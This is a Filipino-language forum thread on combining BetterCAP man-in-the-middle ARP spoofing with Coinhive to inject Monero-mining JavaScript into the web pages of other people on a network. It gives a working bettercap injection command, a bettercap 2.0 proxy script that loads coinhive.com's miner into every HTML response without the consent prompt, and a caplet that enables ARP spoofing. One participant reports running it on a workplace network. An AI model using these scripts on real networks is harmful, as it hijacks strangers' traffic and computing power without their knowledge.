What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

BetterCAP (Man in the Middle) + Coinhive (Monero JavaScript Mining)

Status
Not open for further replies.
Gian20 said:
kailangan sa browser sila no hindi pwede sa mga mobile apps? me option ba kung paano ma lagyan ng js ang https sites? at nagcrcrash sa akin minsan kapag na disconnect sa wifi nagkakaroon ng error at nawawala network ng tuluyan hanggat hindi mo Ctrl+c
Click to expand...

kung native mobile apps syempre hindi pwede, pero kung web-based mobile apps pwede, i am not sure kung default ung ssl stripping for https, pero meron sya check mo nalang documentation
 
Eto rin gamit ng Fitgirl. Sakin ok lang ang ganito basta secured
 
kelsanity01 said:
Eto rin gamit ng Fitgirl. Sakin ok lang ang ganito basta secured
Click to expand...

yup pero dami na din iba web miner bukod sa xmr, search nalang kayo then replace nyo nalang ung iinject nyo na miner
 
AdmiraLBullshit011 said:
wala kasi ako idea, wala nmn sa tut ni TS hehe, Salamat.
Click to expand...

yung na sa first page para sa lahat ng connected sa wifi. kung gusto mo ng per IP only icheck mo sa documentation nila marami naman example doon. eto yung ginawa ko para sa target IP lang mag iinject:
Code: 
 sudo bettercap --proxy-module injectjs --js-file myinject.js --target 192.168.1.8



eto yung output ng bettercap help:
Code: 
 _          _   _
| |__   ___| |_| |_ ___ _ __ ___ __ _ _ __
| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
| |_) |  __/ |_| ||  __/ | | (_| (_| | |_) |
|_.__/ \___|\__|\__\___|_|  \___\__,_| .__/
                                     |_| v1.6.2
http://bettercap.org/



Usage: bettercap [options]

MAIN:

    -I, --interface IFACE            Network interface name - default: wlan0
        --use-mac ADDRESS            Change the interface MAC address to this value before performing the attack.
        --random-mac                 Change the interface MAC address to a random one before performing the attack.
    -G, --gateway ADDRESS            Manually specify the gateway address, if not specified the current gateway will be retrieved and used. 
    -T, --target ADDRESS1,ADDRESS2   Target IP addresses, if not specified the whole subnet will be targeted.
        --ignore ADDRESS1,ADDRESS2   Ignore these addresses if found while searching for targets.
        --no-discovery               Do not actively search for hosts, just use the current ARP cache, default to false.
        --no-target-nbns             Disable target NBNS hostname resolution.
        --packet-throttle NUMBER     Number of seconds ( can be a decimal number ) to wait between each packet to be sent.
        --check-updates              Will check if any update is available and then exit.
    -R, --rainbows                   Rainbow output, because that's a really helpful thing to have (requires the "lolize" gem to be installed).
    -h, --help                       Display the available options.

LOGGING:

    -O, --log LOG_FILE               Log all messages into a file, if not specified the log messages will be only print into the shell.
        --log-timestamp              Enable logging with timestamps for each line, disabled by default.
    -D, --debug                      Enable debug logging.
        --silent                     Suppress every message which is not an error or a warning, default to false.

SPOOFING:

    -S, --spoofer NAME               Spoofer module to use, available: ARP, MAC, NONE, ICMP, NDP, HSRP - default: ARP for IPv4 and NDP for IPv6.
        --no-spoofing                Disable spoofing, alias for --spoofer NONE.
        --full-duplex                Enable full-duplex MITM, this will make bettercap attack both the target(s) and the router.
        --kill                       Instead of forwarding packets, this switch will make targets connections to be killed.

SNIFFING:

    -X, --sniffer                    Enable sniffer.
    -L, --local                      Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.
        --sniffer-source FILE        Load packets from the specified PCAP file instead of the interface ( will enable sniffer ).
        --sniffer-output FILE        Save all packets to the specified PCAP file ( will enable sniffer ).
        --sniffer-filter EXPRESSION  Configure the sniffer to use this BPF filter ( will enable sniffer ).
    -P, --parsers PARSERS            Comma separated list of packet parsers to enable, '*' for all ( NOTE: Will set -X to true ), available: NTLMSS, POST, DICT, SNPP, COOKIE, IRC, WHATSAPP, PGSQL, MPD, HTTPS, BFD, MAIL, DHCP, HTTPAUTH, TEAMTALK, NNTP, URL, HSRP, RADIUS, FTP, MYSQL, REDIS, RLOGIN, WOL, TEAMVIEWER, ASTERISK, SNMP - default: *
        --disable-parsers PARSERS    Comma separated list of packet parsers to disable ( NOTE: Will set -X to true )
        --custom-parser EXPRESSION   Use a custom regular expression in order to capture and show sniffed data ( NOTE: Will set -X to true ).

PROXYING:


  TCP:

        --tcp-proxy                  Enable TCP proxy ( requires other --tcp-proxy-* options to be specified ).
        --tcp-proxy-module MODULE    Ruby TCP proxy module to load.
        --tcp-proxy-port PORT        Set local TCP proxy port, default to 2222 .
        --tcp-proxy-upstream ADDRESS:PORT
                                     Set TCP proxy upstream server address and port.
        --tcp-proxy-upstream-address ADDRESS
                                     Set TCP proxy upstream server address.
        --tcp-proxy-upstream-port PORT
                                     Set TCP proxy upstream server port.

  UDP:

        --udp-proxy                  Enable UDP proxy ( requires other --udp-proxy-* options to be specified ).
        --udp-proxy-module MODULE    Ruby UDP proxy module to load.
        --udp-proxy-port PORT        Set local UDP proxy port, default to 3333 .
        --udp-proxy-upstream ADDRESS:PORT
                                     Set UDP proxy upstream server address and port.
        --udp-proxy-upstream-address ADDRESS
                                     Set UDP proxy upstream server address.
        --udp-proxy-upstream-port PORT
                                     Set UDP proxy upstream server port.
  HTTP:

        --proxy                      Enable HTTP proxy and redirects all HTTP requests to it, default to false.
        --proxy-port PORT            Set HTTP proxy port, default to 8080.
        --allow-local-connections    Allow direct connections to the proxy instance, default to false.
        --no-sslstrip                Disable SSLStrip.
        --log-http-response          Log HTTP responses.
        --no-http-logs               Suppress HTTP requests and responses logs.
        --proxy-module MODULE        Ruby proxy module to load, either a custom file or one of the following: redirect, injectcss, injectjs, injecthtml.
        --http-ports PORT1,PORT2     Comma separated list of HTTP ports to redirect to the proxy, default to 80.
        --proxy-upstream-address ADDRESS
                                     If set, only requests coming from this server address will be redirected to the HTTP/HTTPS proxies.

  HTTPS:

        --proxy-https                Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.
        --proxy-https-port PORT      Set HTTPS proxy port, default to 8083.
        --proxy-pem FILE             Use a custom PEM CA certificate file for the HTTPS proxy, default to /root/.bettercap/bettercap-ca.pem .
        --https-ports PORT1,PORT2    Comma separated list of HTTPS ports to redirect to the proxy, default to 443.

  CUSTOM:

        --custom-proxy ADDRESS       Use a custom HTTP upstream proxy instead of the builtin one.
        --custom-proxy-port PORT     Specify a port for the custom HTTP upstream proxy, default to 8080.
        --custom-https-proxy ADDRESS Use a custom HTTPS upstream proxy instead of the builtin one.
        --custom-https-proxy-port PORT
                                     Specify a port for the custom HTTPS upstream proxy, default to 8083.
        --custom-redirection RULE    Apply a custom port redirection, the format of the rule is PROTOCOL ORIGINAL_PORT NEW_PORT. For instance TCP 21 2100 will redirect all TCP traffic going to port 21, to port 2100.

SERVERS:

        --httpd                      Enable HTTP server, default to false.
        --httpd-port PORT            Set HTTP server port, default to 8081.
        --httpd-path PATH            Set HTTP server path, default to ./ .
        --dns FILE                   Enable DNS server and use this file as a hosts resolution table.
        --dns-port PORT              Set DNS server port, default to 5300.

For examples & docs please visit https://bettercap.org/
 
boss pde nman kahit ung ginawa kung site link nlng paisa isa kung i-browse sa mga pc counted kea ung pag mine nun ??
 
Try co lodi , besides sa pagiging cool ,profitable pa

feedback:

1.working sa ubuntu 16.04 32bit installed on virtualbox

2. ung bettercap wala for mac os x 10.9
 
Last edited:
ljimpact said:
Try co lodi , besides sa pagiging cool ,profitable pafeedback:1.working sa ubuntu 16.04 32bit installed on virtualbox 2. ung bettercap wala for mac os x 10.9
Click to expand...
#2 di ko masubukan sa macos wala ako niyan. kelangan mo lang ng Ruby tapos iinstall mo na yung bettercap gamit ruby. si TS ata MacOs gamit
 
Gian20 said:
#2 di ko masubukan sa macos wala ako niyan. kelangan mo lang ng Ruby tapos iinstall mo na yung bettercap gamit ruby. si TS ata MacOs gamit
Click to expand...

Oo bro. na install co na yung 'homebrew', saka 'ruby' pero ung 'bettercap', for macOS X 10.10.3 , not compatible for macOS x 10.9 (anyways ok sya s ubuntu 16.04 32bit )
 
ni rewrite nila bettercap sa Go lang. supported ang macos

kakarelease lang kahapon :D
 
Last edited:
Script_Kiddie said:
ni rewrite nila bettercap sa Go lang. supported ang macos

kakarelease lang kahapon :D
Click to expand...

nice one meron na for android, pd din sa docker, anyways update ko nalang pag may freetime ako :)
 
sa totoo lang di ko alam kung bakit andito ako di naman ako miner :rofl:

para sa bettercap 2.0

save this file to miner.js (or kung ano mang nais nyong ipangalan)

Code: 
function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n' +
                '<script>\n' +
                '    var miner = new CoinHive.Anonymous("YOUR PUBLIC KEY", {throttle: 0.5});\n' +
                '    if (!miner.isMobile() && !miner.didOptOut(14400)) {\n' +
                '        miner.start();\n' +
                '    }' +
                '</script>\n' +
                '</head>'
            ); 
        }
    }
}

save this file to miner.cap (or kung ano mang nais nyong ipangalan. kung ibang pangalan ang ginamit sa code sa taas palitan itong nasa baba.)

Code: 
set http.proxy.script miner.js
http.proxy on
sleep 1
arp.spoof on

run bettercap (eg for OSX)

sudo bettercap -iface en0 -caplet miner.cap

NOTE:
1. ilagay lahat ang file sa isang directory
2. siguraduhing tama ang interface na gamit (sa example 'en0' maaaring iba sa iba)

kung feel nyo mag mukang pro pwede i-execute ung commands na nasa loob ng cap(caplet file) sa loob ng bettercap prompt

DISCLAIMER: tulad ng sinabi ni TS gamitin lang sa sariling network. layuning pang edukasyon lamang. gamitin ang legit script na galing sa coinhive w/ prompt. ang script na ginamit dito ay walang prompt.
 
Last edited:
@Script_Kiddie thanks sa update boss :)
 
Last edited:
bina block po ng eset Boss. arp cache poisoning attack daw, nagulat mga katrabaho ko biglang nag pop sa lahat

edit#1: para saan p pala yung bettercap Boss? kikita rin ba ng hash dun?

edi#2: eto pala SS ko, nalimutan kung i upload, btw san po banda makikita yung galing sa network?

d4kmGGe.PNG


EmiY9oT.PNG
 
Last edited:
ScyllaJEN96 said:
bina block po ng eset Boss. arp cache poisoning attack daw, nagulat mga katrabaho ko biglang nag pop sa lahat

edit#1: para saan p pala yung bettercap Boss? kikita rin ba ng hash dun?

edi#2: eto pala SS ko, nalimutan kung i upload, btw san po banda makikita yung galing sa network?

http://tinyimg.io/i/d4kmGGe.PNG

http://tinyimg.io/i/EmiY9oT.PNG
Click to expand...

thanks sa feedback :)

#1 bettercap is the Swiss army knife for network attacks and monitoring. it has nothing to do with mining...
#2 you can't see the hash per machine sa dashboard, unless gagawan mo ng site per machine...
 
Matagal din pala (after 3 days) hehehe, pero sana umabot sa minimum bago mag 15 days.

wj544fc.PNG
 
Status
Not open for further replies.

Similar threads

puchoy
FREE Pi coin when you download app - 10M KYC'ed and 50m playstore downloads na - Pi Network will Open Mainnet in June 28 2024? new BTC daw?
Replies
0
Views
142
puchoy
puchoy
safedie
Help i7 10700 or 10700k?
Replies
2
Views
233
safedie
safedie
maysahodna
Share ko lang crypto experience ko..
Replies
3
Views
1K
PH-Maton
P
HHubs
[UPDATE] Siargao trip Nov 2023
Replies
7
Views
535
HHubs
HHubs
gerc018
BTC FREE MINING (tried and tested)
Replies
3
Views
1K
gerc018
gerc018
Back
Top Bottom